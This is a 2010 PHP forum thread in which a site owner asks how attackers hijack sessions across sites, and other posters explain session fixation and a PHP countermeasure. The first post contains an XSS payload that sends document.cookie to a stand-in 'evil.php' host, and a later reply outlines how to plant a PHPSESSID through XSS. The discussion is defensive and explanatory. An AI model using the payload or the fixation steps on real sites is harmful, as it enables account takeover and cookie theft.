cross site session hi-jacking - php

Discussion in 'PHP' started by ForumSeeder, Feb 3, 2010.

  1. #1
    I'm not quite sure how this is done. Does anyone have experience in this?

    I know how you can use xss to send session info for a cookie cross site,

    for example:

    ```html
    javascript: void(document.getElementById('theIdOfAnElement').innerHTML='<a onmouseover ="alert(document.cookie);" >mouseOverToShowCookie</a> <a href="javascript:window.location=www.example.com/evil.php?c=%22+document.cookie"> dOnT CLiCk ThiS</a>');
    ```
    ... and then capture that cookie on the other site and re-use it (you'll first need to find a way to get the script into the site, but you can test the method above with JavaScript injection).

    But I can't find any information on how to hi-jack the PHP session cross site.

    I've seen people attempting this on one of my sites. They came into my site trying to attack it with pre-loaded session information set (I log any strange behaviour like this, and I prevent the attack with dynamic session UUIDs that are set all over the place).

    I'm not sure how they are attempting the attack, since if you go outside of your domain you can't do a session dump: starting a new session on a different domain sets a new session ID (and hence none of your session variables are set).

    eg:



    So I'm wondering how people are trying to attack one of my sites with pre-defined session data?

    If I go cross domain and try to dump all of my session variables:
    ```php
    <?php var_dump($_SESSION); ?>
    ```
    Then, as expected, none are set (I would be worried if they were).

    So if you're an attacker, how do you go into a site with session variables already set?
     
    Last edited: Feb 3, 2010
    ForumSeeder, Feb 3, 2010
  2. SmallPotatoes
    #2
    They can't set the contents of $_SESSION - if that's happening, you have a hole somewhere.

    What they can do is force the use of a particular session, unless you session_regenerate_id() upon login.

    Attackers may try to coax an authorised user to use a known session ID so they can assume control of that session once the user logs in.
     
    SmallPotatoes, Feb 3, 2010
  3. ForumSeeder
    #3
    Yes, that's what I thought. Everything I've read suggests you can't set the session variables for a page cross site.

    I've used system penetration tools such as Paros to capture and resend $_GET and $_POST, but I was worried there were other tools you could use to set the session that I didn't know about. The session variables are set server side, right? So it wouldn't be theoretically possible to create a tool that could set these, would it? (Unless the tool sat on a shared host... but I'm not looking in that direction for now.)

    When you say session ID coaxing, are you talking about the PHP session ID, or other session IDs (for example within cookies, as shown in my example)? If PHP session IDs, how would you get this information without using a server-side script? I can't see how a user could get this information.

    However, if they did get the PHP session ID somehow (???) then I could see how cross site session theft was possible (since you could set the session ID externally, start a session, then dump all the session variables for that session ID).

    So, how could you get a user / system to give up the session ID?
     
    Last edited: Feb 3, 2010
    ForumSeeder, Feb 3, 2010
  4. SmallPotatoes
    #4
    The way PHP's session handler works, if you show up with a session ID it doesn't know about, it just starts a new session with that ID. The session ID can be provided as a cookie, or as a sid= argument in the query string if your PHP installation is configured to allow that.

    So, say I could use XSS to get a visitor to your site to create a new cookie in your domain, PHPSESSID=012345. Then I know the visitor is going to use that session ID when they go to your site. I wait until they go to your site and log in. Then, from my secret lair in the mountains, I also go to the site with PHPSESSID=012345. Presto, I am pre-authenticated as that user and can do/see anything they can.
     
    SmallPotatoes, Feb 3, 2010
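An added example, not code from the thread or from either poster, of the server-side countermeasures the two replies above point to: refusing session IDs the server never issued (so an unknown PHPSESSID no longer silently starts a session under that ID) and regenerating the ID at login so a planted cookie never maps to the authenticated session. It assumes PHP 7.3 or later; the credential check and its single demo user are hypothetical stand-ins.

```php
<?php
// Added example, not from the thread: a login flow hardened against the
// session-fixation pattern described above. check_credentials() is a
// hypothetical stand-in for a real user lookup.
declare(strict_types=1);

// Refuse session IDs the server did not issue. Without this, a request that
// arrives with an unknown PHPSESSID silently starts a session under that ID.
ini_set('session.use_strict_mode', '1');
// Take the ID from the cookie only, never from ?PHPSESSID=... in the URL.
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');
// Keep the cookie out of document.cookie, off plain HTTP, off cross-site requests.
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,
    'httponly' => true,
    'samesite' => 'Lax',
]);
session_start();

// Constructed demo credential store: one user, hash computed at load time.
const DEMO_USER = 'alice';
$DEMO_HASH = password_hash('correct horse battery staple', PASSWORD_DEFAULT);

function check_credentials(string $user, string $pass): ?int
{
    global $DEMO_HASH;
    return ($user === DEMO_USER && password_verify($pass, $DEMO_HASH)) ? 1 : null;
}

function login(string $user, string $pass): bool
{
    $uid = check_credentials($user, $pass);
    if ($uid === null) {
        return false;
    }
    // Discard whatever ID the browser arrived with (it may have been planted)
    // and issue a fresh one; `true` deletes the old session data so the
    // planted ID can never resolve to the authenticated session.
    session_regenerate_id(true);
    $_SESSION = ['uid' => $uid, 'auth_time' => time()];
    return true;
}
```

Calling `login()` only after a successful credential check is the point: regenerating before authentication would just hand the attacker-controlled browser a new ID that is still shared with nobody.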
  5. ForumSeeder
    #5
    Ahh, the cookie session ID is the same as the PHP session ID, that's a bad idea! So all a hacker would have to do is send the user's cookie to a GET/POST externally, redirect the user to the page, set the PHP session ID to the same as the one in the cookie, and then you can also get a complete PHP session dump (saving both the cookie and any other PHP session information that might be useful... hmmm).
     
    ForumSeeder, Feb 5, 2010
  6. SmallPotatoes

    Well, there's no way for the client to get the contents of $_SESSION unless you have programmed one into your application. All they can do is take over the session.
     
    SmallPotatoes, Feb 5, 2010
  7. ForumSeeder
    #7

    Okay, so a session dump cross site shouldn't be possible. So really we're only talking about cookie theft like in my first example.
     
    ForumSeeder, Feb 5, 2010